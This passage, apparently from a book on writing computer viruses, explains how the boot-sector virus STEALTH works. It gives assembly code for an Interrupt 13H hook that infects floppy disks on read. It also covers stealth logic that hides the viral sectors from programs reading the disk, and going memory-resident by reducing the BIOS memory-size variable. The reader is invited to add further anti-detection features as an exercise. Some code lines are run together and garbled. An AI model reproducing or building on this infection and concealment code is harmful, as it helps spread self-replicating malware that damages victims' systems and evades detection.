Code for this type of an interrupt trap looks like this:
INT_13H:
sti ;interrupts on
cmp ah,2 ;we want to intercept reads jnz I13R ;pass anything else to BIOS cmp dh,0 ;is it head 0?
jnz I13R ;nope, let BIOS handle it cmp ch,0 ;is it track 0?
jnz I13R ;nope, let BIOS handle it RF0: cmp dl,80H ;is it the hard disk?
jnc I13R ;yes, let BIOS handle read cmp cl,1 ;no, floppy, is it sector 1?
jnz I13R ;no, let BIOS handle it call CHECK_DISK ;is floppy already infected?
jz I13R ;yes so let BIOS handle it call INFECT_FLOPPY ;else go infect the diskette ;and then let BIOS go
;do the original read I13R: jmp DWORD PTR cs:[OLD_13H] ;BIOS Int handler
where OLD_13H is the data location where the original Interrupt 13H vector is stored before it is replaced with a vector to INT_13H.
CHECK_DISK simply calls GET_BOOT_SEC and IS_VBS after saving all the registers (to pass them to the BIOS later to do the originally requested read).
Since the virus is already intercepting Interrupt 13H to infect disks, it is not too difficult to add a little functionality to the viral interrupt handler to hide certain sectors from prying eyes. For example, consider an attempt to read the boot sector on a 1.2 megabyte diskette: STEALTH traps the request to read. Instead of just blindly servicing it, the virus first reads the boot sector into its own buffer. There, it checks to see if this sector is the viral boot sector. If not, it allows the caller to read the real boot sector. On the other hand, if the real boot sector belongs to STEALTH, it will read the old boot sector from Track 79, Head 1, Sector 15, and pass that to the caller instead of the viral boot sector. In this way, the viral boot sector will be invisible to any program that uses either DOS or BIOS to read the disk (and the exceptions to that are pretty rare), provided the virus is in memory. In the same way, the BIOS write
BIOS Read Sector Request Intercepted
Head 0?
Track 0?
Y
Sector 0?
N
Read Boot Sec Is Disk Infected?
N
Y
N
N Y
Pass Control to ROM BIOS Hard Disk?
Move dummy data to es:bx Infect Disk
Sec 2-7?
Y
N
Y
N
Read Old Boot Sector from Hidden Area on disk Move Old Boot Sector to es:bx specified by caller
Y
Return to calling routine Figure 16: Viral Read Logic.
function can be redirected to keep away from the viral boot sector, redirecting any attempts to write there to the old sector.
In addition to hiding the boot sector, one can hide the rest of the virus from any attempts to access it through Interrupt 13H.
On hard drives, STEALTH does not allow one to read or write to sectors 2 through 7 on Track 0, Head 0, because the virus code is stored there. It fools the program making a read attempt by return-ing a data block of zeros, It fools the program tryreturn-ing to write those sectors by returning as if it had written them, when in fact the writing was bypassed.
Additionally, any attempt to read or write to sectors on the floppy drive could be trapped and returned with an error (carry flag c set). That is what one would expect, if the clusters marked as bad in the FAT really were bad. STEALTH does not go that far though, since DOS protects those sectors pretty well already. You may want to try to incorporate that extension in as an exercise, though.
With these anti-detection procedures in place, the main body of the virus is well hidden, and when any program looks at the boot sector, it sees the old boot sector. The only ways to detect the virus on a disk are (a) to write a program to access the disk with the hardware directly, or (b) to boot from an uninfected disk and examine the boot sector of the potentially infected disk. Of course, the virus is not very well hidden in memory.
Installing the Virus in Memory
Before the virus passes control to the original boot sector, which will load DOS, it must set itself up in memory somewhere where it won’t get touched. To do this outside of the control of DOS is a bit tricky. The basic idea involved here is that DOS uses a number stored at 0040:0013 Hex, which contains the size of avail-able memory in kilobytes. This number is set up by the BIOS before it reads the boot sector. It may have a value ranging up to 640 = 280H. When the BIOS sets this parameter up, it looks to see how much memory is actually installed in the computer, and reports it here. However, something could come along before DOS loads and change this number to a smaller value. In such a situation, DOS
will not use all the memory that is available in the system, but only what it’s told to use by this memory size variable. Memory above that point will be reserved, and DOS won’t touch it.
The strategy for loading STEALTH into memory is to put it in the highest physical memory available, determined by the memory size, as the BIOS has set it. Then STEALTH subtracts a sufficient number of kilobytes from the memory size variable to protect itself. In this way, that memory will be kept away from DOS, and used by STEALTH when Interrupt 13H is called.
The two responsibilities of the viral boot sector are to load the main body of the virus into memory, and then to load and execute the original boot sector. When the BIOS loads the viral boot sector (and it loads whatever is placed at Track 0, Head 0, Sector 1), that sector first moves itself into the highest 512 bytes of memory (within the 640 kilobyte limit). In a machine with 640K of memory, the first unoccupied byte of memory is at A000:0000.
(A) Viral boot sector moves itself to high
memory.
(B) Viral boot sector loads the rest of virus
and old boot sector.
(C) Viral boot sector installs Int 13H and
moves old boot sector to execute.
Viral BS
Viral BS
A000:0000
0000:7C00
Viral BS Old BS Main Body of
Virus
F000:2769 A000:0000
9820:7000
0000:004C
A000:0000
9820:7000
0000:004C 0000:7C00
Viral BS
Main Body of
Virus
Old BS
9820:0054
Figure 17: The Virus in RAM.
The boot sector will move itself to the first 512 bytes just below this. Since that sector was compiled with an offset of 7C00 Hex, it must relocate to 9820:7C00 Hex (which is right below A000:0000), as desired. Next, the viral boot sector will read the 6 sector long main body of the virus into memory just below this, from 9820:7000 to 9820:7BFF. The original boot sector occupies 9820:7A00 to 9820:7BFF (since it is the sixth of six sectors loaded).
The viral boot sector then subtracts 4 from the byte at 0040:0013H to reserve 4 kilobytes of memory for the virus. Next, the viral boot sector reroutes Interrupt 13H to the virus. Finally, it moves the original boot sector from 9820:7A00 to 0000:7C00 and executes it.
The original boot sector proceeds to load DOS and get the computer up and running, oblivious to the fact that the system is infected.